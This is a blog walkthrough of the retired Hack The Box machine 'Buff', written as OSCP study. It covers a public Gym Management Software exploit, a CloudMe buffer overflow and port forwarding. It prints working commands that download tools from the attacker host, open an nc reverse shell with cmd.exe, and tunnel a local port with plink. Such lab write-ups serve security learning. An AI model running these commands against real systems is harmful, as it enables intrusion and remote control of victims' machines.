Road to OSCP: HTB Series: BUFF

Continuing on my road to OSCP certification, I am in the midst of preparation for the exams in January. Part of my preparation is to take on the retired machines available in Hack in The Box (HTB) platform. This platform is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.

In this HTB series, I will be sharing my write-ups on all the retired machines that I have and will attempt. If you are wondering, “How does he know which machine to do to prepare for OSCP?” Well, I am using TjNull list of OSCP-like boxes in HTB which can be found here

This box was pretty straightforward. The initial shell was easy to obtain because public exploit was available and it was just how we utilise it to obtain user shell. The privilege escalation portion, however, was where I rabbit holed a bit and found the service that was listening locally that I could exploit again, with a public exploit. The interesting about this is how I had to utilise port forwarding technique to achieve and obtain a shell with Administrator Privileges.

Recon Phase

To begin with this box, we first carry out our basic Reconnaissance. For me, I used AutoRecon which is developed and scripted by Tib3rius. It is one of my fundamental scans I make before moving on to more manual enumeration for specific ports or applications. From the full port Nmap scan results done by AutoRecon:

Output of the result from a full port scan with Nmap automated by AutoRecon

We see two ports open: 7680 and 8080. Port 8080 is Apache 2.4.43 and it is probably a web application running on PHP 7.4.6. This is probably the port we want to start on.

Information Gathering

Browsing on the web browser:

Home Page for the web application on port 8080

We see a web page that sees to be about health and wellness. We also see a sign in page for the users.

On the Contact, we see something quite interesting:

Contact Page of the Website

Here we see that this webpage we are seeing is made using Gym Management Software 1.0. If we were to google this software with its version number, we immediately get a hit on a public exploit that we can utilise:

GoogleFU helping us find a hit on the exploit

Grabbing the exploit after reading it on exploitdb:

Output of the public exploit for Gym Management Software 1.0

We see that we obtained a web shell successfully! However, this shell is not the most stable (it is a bit funky) and we want to get a better foothold.

Setting up a python server where nc.exe and wget.exe is located, we then use PowerShell to transfer our wget.exe over to the victim machine using the webshell and then running wget.exe to grab our nc.exe over to the victim machine. Lastly, using the nc.exe , we can use it to create a reverse shell from the victim machine to the attacking machine. All this is done below:

Transferral of nc.exe and wget.exe
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3/wget.exe','C:\xampp\htdocs\gym\upload\wget.exe')"wget.exe http://10.10.16.3/nc.exenc.exe -nv 10.10.16.3 4444 -e cmd.exe

On our listener, we obtained our initial shell and from there obtaining our user.txt:

Obtaining reverse shell from buff machine
Flag for user.txt obtained!

Privilege Escalation

Information Gathering

Transferring our enumeration batch file over after setting up a python http server on our directory where winPEAS.bat is at:

Getting our winPEAS.bat file for enumeration

After running the winPEAS.bat file, we notice something interesting in the ports that are currently listening on this machine:

Port 8888 seems like a strange port to be open and listening locally

We also found an executable on manual enumeration of the user’s folder:

An executable was found in the Download folder for user shaun

When I did a bit of googling, I found a public exploit available for a software CloudMe 1.11.2 which seems to match the executable that I found:

GoogleFU brought me here

Using Searchsploit, I would also find something similar but with a local implementation which is what we needed as this port can only be accessed from within the machine. Grabbing that exploit:

Grabbing the public exploit for CloudMe

Exploitation

We also need to change our shellcode payload in the public exploit so that we can utilise it, so using msfvenom to generate our shellcode payload, using a similar command found in the commented section for the shellcode in the public exploit:

Our shellcode payload

Modifying the public exploit to load our own shellcode payload:

Since this exploit can only be done locally, and we do not have python3 on the server. We look to using port forwarding technique that will allow us to forward traffic from our port to the targeted port on the victim machine. This will allow us to execute the exploit locally on our attacking machine and reroute the output of the execution as input to the port where CloudMe is listening on the victim machine which is port 8888.

plink64.exe -ssh -l hack -pw hack -N -R 10.10.16.3:8001:127.0.0.1:8888 10.10.16.3

After running the command above, we verify that the port forwarding is successful:

Then running the CloudMe executable to start the service on port 8888:

Running the CloudMe Executable

Then running the exploit:

Running the modified exploit

Then on our listener:

Obtained a reverse shell from the victim machine!

We managed to get a shell as Administrator! Then grabbing our root.txt flag:

We have successfully owned this machine!

Learning Points

The main learning point here for me playing as the offensive role here, was the port forwarding. I had to recall and remember how to do it via port forwarding and furthermore, understand how it works. I would not say that I got it 100% down, but I can understand the reason why we need to master port forwarding to pivot or to access local ports. This was a good machine to put that to practice.

Thank you for reading! And like always if you enjoy this write-ups, subscribe to my publications or follow me on twitter @lojomojo96 and hit me up with a DM! It will really encourage me to write and share even as I prepare for my OSCP Certification. Of course, if there are points to improve upon my own methodology, do let me know too! You can also find me on LinkedIn as well!

https://twitter.com/lojomojo96

https://www.linkedin.com/in/louis-joshua-low/

--

--

--

OSCP | CTF Player | Penultimate Information System Student in SMU | Major in Cybersecurity

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Early Thoughts on the Possible Impacts of the CLOUD Act

Protofire Deploys a Fork of Gnosis Safe Multisig into Moonriver to Enforce Security

GBC Mechanism

LambSwap Platform — IDO Details and Guide, January 20th, 2022 — 10:00 UTC

Memoverse X ForcePad WHITELIST/GIVEAWAY CAMPAIGN IS OPEN NOW

The Feed that fits me

Honeypot: Seoul, South Korea

YFDAI Announces ImpulseVen as First LaunchPad Project

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Louis Low

Louis Low

OSCP | CTF Player | Penultimate Information System Student in SMU | Major in Cybersecurity

More from Medium

Hack the Box: Active Write-Up

Tryhackme: Internal

Throwback — Part 1 — pfSense

InfoSec Prep: OSCP (Walkthrough)